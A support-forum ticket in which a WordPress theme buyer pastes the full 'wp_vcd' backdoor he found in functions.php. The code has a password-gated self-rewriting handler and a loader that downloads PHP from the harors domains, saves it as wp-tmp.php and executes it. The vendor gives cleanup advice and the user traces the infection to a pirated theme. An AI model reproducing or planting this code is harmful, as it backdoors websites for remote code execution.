Okay
  Public Ticket #2011245
Use of undefined constant REQUEST_URI
Closed

Comments

  • Marcos started the conversation

    I'm getting all the time the following error: Notice: Use of undefined constant REQUEST_URI - assumed 'REQUEST_URI' in /home/troca546/public_html/segredosdosonho.com.br/wp-content/themes/reco/functions.php on line 80

    line 80 contains this code: $ path = $ _SERVER ['HTTP_HOST']. $ _SERVER [REQUEST_URI];

    What is going on ?

  •  184
    Estudio replied

    That code is not part of the theme.

    Here is the original line nº 80 from reco/functions.php http://prntscr.com/noo00h

    Also we are not using $_server variables because Wordpress already solvent that with 

    get_template_directory_uri() and  get_template_directory() functions as you can see in the top of that file: http://prntscr.com/noo0ci

    Check if any of your plugins is generating the error and also it is a good idea to check if the functions.php file was edited from an external source (you can download the original file from your Themeforest account to compare).

  • Marcos replied

    I discovered that this is a virus. And the strange thing is that only this file is generated in your template. Not the others. I'll put the complete code:

    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '854785564679e57fd8816b221e41bb5a'))
    {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {

    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
    {

    if (!empty($_REQUEST['newdomain']))
    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                        {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {

                                                                               $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                               @file_put_contents(__FILE__, $file);
                               print "true";
                                                                                                                 }

                                                                        }
    }
    }
    break;

    case 'change_code';
    if (isset($_REQUEST['newcode']))
    {

    if (!empty($_REQUEST['newcode']))
    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                        {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {

                                                                               $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                               @file_put_contents(__FILE__, $file);
                               print "true";
                                                                                                                 }

                                                                        }
    }
    }
    break;

    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
    }

    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            
            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
       {
       }
    else
    {
    $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    }
    fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            

    $wp_auth_key='3141695589e0e8d9d18fb3d75b5cf774';
            if (($tmpcontent = @file_get_contents("http://www.harors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.harors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
            
            
            elseif ($tmpcontent = @file_get_contents("http://www.harors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            } 

            elseif ($tmpcontent = @file_get_contents("http://www.harors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
               
            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 

            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 

            } 
            
            
            
            
            
        }
    }

    por que isso está acontecendo apenas no template de vocês ?

  •  184
    Estudio replied

    In that case i recommend you to download the theme again from your Themeforest Account and reinstall.

    We followed all Wordpress and Envato standards so it is something related to your hosting account.

    When you are attacked by a virus can be something related to a plugin, wordpress core (not updated) or hosting security breach.

    If your website is not secure enough, it is recommended to install a security plugin like WP defender or Sucuri and do a full scan of your hosting, probably you will find virus file on your FTP if you do a quick search.

    The most recommended is to contact your hosting provider to explain your current situation, probably they can do a full scan and clean all your website.

  • Marcos replied

    I identified the problem dearly. Before buying the template I downloaded one from the internet to see what it was like. And that theme infected my entire database. I installed a plugin that scanned and identified the malwares and removed. Now everything is ok.

    Thank you

  •  184
    Estudio replied

    Perfect!, keep that scan plugin installed and change your FTP / Admin credentials.

    It is common once you have been attacked, some external files (outside your main WP installed) can be affected too, so it is always good to do a full check to your public_html folder.

    Probably you know it, but, if you install a theme from a not trusted source (nulled themes or similar) there is a high risk to get a virus and loose all your information.

    Going to close this ticket then.